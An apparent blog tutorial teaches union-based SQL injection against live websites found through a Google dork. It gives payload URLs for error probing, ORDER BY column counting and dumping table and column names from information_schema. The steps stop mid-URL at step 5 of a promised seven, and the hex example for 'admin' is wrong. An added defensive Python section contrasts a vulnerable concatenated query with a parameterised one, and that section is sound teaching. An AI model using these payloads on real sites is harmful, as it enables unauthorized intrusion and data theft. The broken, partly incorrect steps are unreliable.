This tutorial is a very simple one because I'm going to explain it in a very simple way. I will explain this SQLi hacking in just 7 easy steps!

Step 1: Use your Google dork to find a web vulnerable to SQLi, e.g. inurl:news.php?id= site:.in. We got our web www.site.in/news.php?id=5. We add ' to the end of the URL, so it will look like www.site.in/news.php?id=5'. If it's vulnerable, you will get an error message like You have a MySql error in bla bla near "/"; if it's not, look for another web.

Step 2: Use your order by query to know how many columns exist in the web. If you get a message like unknown column "12" in order clause, you must keep changing the numbers, either in increasing or decreasing order, until the site loads normally. E.g. you use order+by+6-- Error, down to order+by+4-- No Error; that means the web has 4 columns. It will be like www.site.in/news.php?id=5+order+by+4.

Step 3: Since you know that the web has 4 columns, it's time to use the union+select query to know the vulnerable column where we do all our injections. Sometimes there can be more than 2 vulnerable columns; just pick 1 to work on. It will be like this: www.site.in/news.php?id=-5+union+select+1,2,3,4-- Then the vulnerable column will show. Here, let's say the vulnerable column is 2; that means column 2 is where all our injections will take place.

Step 4: Your URL will be like this now: www.site.in/news.php?id=-5+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

Step 5: After doing step 4, some tables will appear. If you're lucky, you will see the admin table directly, with the name admin; now it's time to "hex" that table. If not, you guess which one is the admin table. Now go to stringnote.com/tools/texttohex.php, put admin in the box and hex it. You will see numbers, all the same but in different formats; pick the one that is joined together, e.g. 696e41d3, and execute your code like this: www.site.in/news.php?id=-5+union+select+1,group_concat(column_name),3,4+from+information_schema.columns
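From the defending side, steps 1 to 3 above work only when the id parameter is concatenated into the query text and database errors are shown to the visitor. The following is an added example, not part of the original article: it runs the article's own step 1 to 3 inputs against such a handler and against one that validates the id and binds it as a parameter. The table layout, function names and the in-memory SQLite database (standing in for the PHP/MySQL site) are assumptions.

```python
import sqlite3

# Inputs taken from steps 1-3 of the article, URL-decoded ("+" is a space).
ARTICLE_INPUTS = ["5'", "5 order by 6--", "5 order by 4--", "-5 union select 1,2,3,4--"]


def make_db():
    """Constructed sample data: a 4-column news table (assumed layout)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT)")
    conn.execute("INSERT INTO news VALUES (5, 'Hello', 'First post', 'editor')")
    return conn


def get_news_vulnerable(conn, raw_id):
    """Weak form: input concatenated into the SQL text, DB error shown to the client."""
    try:
        return conn.execute(
            "SELECT id, title, body, author FROM news WHERE id=" + raw_id
        ).fetchall()
    except sqlite3.Error as exc:
        return "SQL error: " + str(exc)  # the error page step 1 looks for


def get_news_hardened(conn, raw_id):
    """Corrected form: strict integer check, bound parameter, no error detail."""
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        return []  # same response as "no such article"
    try:
        return conn.execute(
            "SELECT id, title, body, author FROM news WHERE id = ?", (int(raw_id),)
        ).fetchall()
    except sqlite3.Error:
        return []  # log server-side; never echo the database message


if __name__ == "__main__":
    db = make_db()
    for value in ["5"] + ARTICLE_INPUTS:
        print(repr(value))
        print("  vulnerable:", get_news_vulnerable(db, value))
        print("  hardened:  ", get_news_hardened(db, value))
```

With the hardened handler every input from the article gets the same empty response as a missing article, so there is no error message to confirm step 1 and no column count or reflected column for steps 2 and 3.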
Thanks for reading my article
HOW TO HACK A WEB USING SQL
Created at 2016-09-30 18:33:33